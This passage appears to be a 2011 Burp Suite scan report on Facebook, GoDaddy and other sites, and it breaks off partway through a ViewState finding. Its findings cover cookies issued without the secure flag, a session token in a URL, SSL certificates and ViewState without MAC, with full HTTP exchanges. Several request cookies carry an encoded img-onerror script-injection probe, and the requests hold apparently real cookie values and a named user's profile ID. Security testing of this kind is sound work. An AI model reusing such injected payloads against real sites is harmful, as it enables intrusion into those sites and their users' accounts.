<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.8. https://www.facebook.com/h02332  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.27
X-Cnection: close
Date: Thu, 05 May 2011 12:37:05 GMT
Content-Length: 14497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.9. https://www.facebook.com/help/contact.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /help/contact.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/recover.php?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.10. https://www.facebook.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.11. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=Mkkns; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.66.104
X-Cnection: close
Date: Thu, 05 May 2011 02:09:53 GMT
Content-Length: 46999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

6.12. https://www.facebook.com/pages/create.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/create.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.22.122
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 32123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.13. https://www.facebook.com/r.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /r.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.226.129
Connection: close
Date: Thu, 05 May 2011 10:56:58 GMT
Content-Length: 29546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.14. https://www.facebook.com/recover.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /recover.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /recover.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; act=1304613672018%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613672031%2C%22act%22%2C1304613672018%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Flogin.php%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C482%2C422%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: L=2; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=1304595854; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
Set-Cookie: W=1304595854; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.132
X-Cnection: close
Date: Thu, 05 May 2011 11:44:14 GMT
Content-Length: 18743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.15. https://www.godaddy.com/gdshop/hosting/landing.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...

6.16. https://www.godaddy.com/gdshop/registrar/search.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Thu, 28 Apr 2011 12:17:24 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:23 GMT
Connection: close


6.17. https://www.godaddy.com/gdshop/website.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/website.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:25 GMT
Location: https://www.godaddy.com/hosting/website-builder.aspx?app%5Fhdr=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:24 GMT
Connection: close


7. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /extern/login_status.php?api_key=132151116822711&app_id=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12aabd56%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c0616c4%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23792e5e8%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d6b0d054%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24e5b0ab%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.115.59
X-Cnection: close
Date: Thu, 05 May 2011 00:57:31 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

8. SSL certificate  previous  next
There are 4 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



8.1. https://www.facebook.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  www.facebook.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Sun Nov 14 18:00:00 CST 2010
Valid to:  Mon Dec 02 17:59:59 CST 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

8.2. https://www.fightmagazine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fightmagazine.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.fightmagazine.com
Issued by:  Thawte SSL CA
Valid from:  Mon Apr 04 19:00:00 CDT 2011
Valid to:  Thu May 03 18:59:59 CDT 2012

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

8.3. https://www.godaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.GoDaddy.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Jan 04 10:21:18 CST 2011
Valid to:  Mon Jan 14 16:28:36 CST 2013

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

8.4. https://www.neodata.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neodata.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.neodata.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Mon Aug 17 19:00:00 CDT 2009
Valid to:  Sun Sep 04 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

9. ASP.NET ViewState without MAC enabled  previous  next
There are 5 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


9.1. http://www.bankrate.com/funnel/mortgages/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bankrate.com
